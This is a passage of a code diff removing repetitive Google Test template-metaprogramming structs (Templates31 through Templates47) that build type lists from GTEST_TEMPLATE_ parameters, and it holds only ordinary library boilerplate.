-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31>
-struct Templates31 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates30<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32>
-struct Templates32 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates31<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33>
-struct Templates33 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates32<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34>
-struct Templates34 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates33<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35>
-struct Templates35 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates34<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36>
-struct Templates36 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates35<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37>
-struct Templates37 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates36<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38>
-struct Templates38 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates37<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39>
-struct Templates39 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates38<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40>
-struct Templates40 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates39<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41>
-struct Templates41 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates40<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42>
-struct Templates42 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates41<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41,
-      T42> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43>
-struct Templates43 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates42<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42,
-      T43> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44>
-struct Templates44 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates43<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42,
-      T43, T44> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44, GTEST_TEMPLATE_ T45>
-struct Templates45 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates44<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42,
-      T43, T44, T45> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44, GTEST_TEMPLATE_ T45,
-    GTEST_TEMPLATE_ T46>
-struct Templates46 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates45<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42,
-      T43, T44, T45, T46> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44, GTEST_TEMPLATE_ T45,
-    GTEST_TEMPLATE_ T46, GTEST_TEMPLATE_ T47>
-struct Templates47 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates46<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42,
-      T43, T44, T45, T46, T47> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
